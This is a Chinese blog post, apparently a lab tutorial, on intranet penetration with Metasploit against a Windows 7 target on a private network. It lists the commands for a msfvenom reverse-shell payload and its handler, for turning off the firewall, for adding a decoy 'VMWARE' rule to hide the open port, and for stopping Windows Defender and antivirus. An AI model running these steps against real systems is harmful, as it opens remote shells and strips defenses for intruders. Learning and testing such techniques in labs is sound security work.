当前位置:网站首页>内网渗透之内网信息收集(一)
内网渗透之内网信息收集(一)
2022-07-06 09:22:00 【不知名白帽】
目录
内网渗透之内网信息收集(二)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe
02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
将payload发送到目标机器让其执行
执行成功
linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)
03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)
通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
边栏推荐
猜你喜欢
[VMware abnormal problems] problem analysis & Solutions
Mixlab unbounded community white paper officially released
Canvas foundation 1 - draw a straight line (easy to understand)
附加简化版示例数据库到SqlServer数据库实例中
【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
Strengthen basic learning records
使用Spacedesk实现局域网内任意设备作为电脑拓展屏
Attach the simplified sample database to the SQLSERVER database instance
Strengthen basic learning records
Harmonyos JS demo application development
随机推荐
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
[hand tearing code] single case mode and producer / consumer mode
4. Branch statements and loop statements
强化学习基础记录
7-4 散列表查找(PTA程序设计)
Nuxtjs quick start (nuxt2)
2. First knowledge of C language (2)
About the parental delegation mechanism and the process of class loading
Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
7-14 错误票据(PTA程序设计)
The difference between cookies and sessions
Relationship between hashcode() and equals()
Experiment 9 input and output stream (excerpt)
7-9 制作门牌号3.0(PTA程序设计)
FAQs and answers to the imitation Niuke technology blog project (III)
js判断对象是否是数组的几种方式
Leetcode. 3. Longest substring without repeated characters - more than 100% solution
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
[experiment index of educator database]
扑克牌游戏程序——人机对抗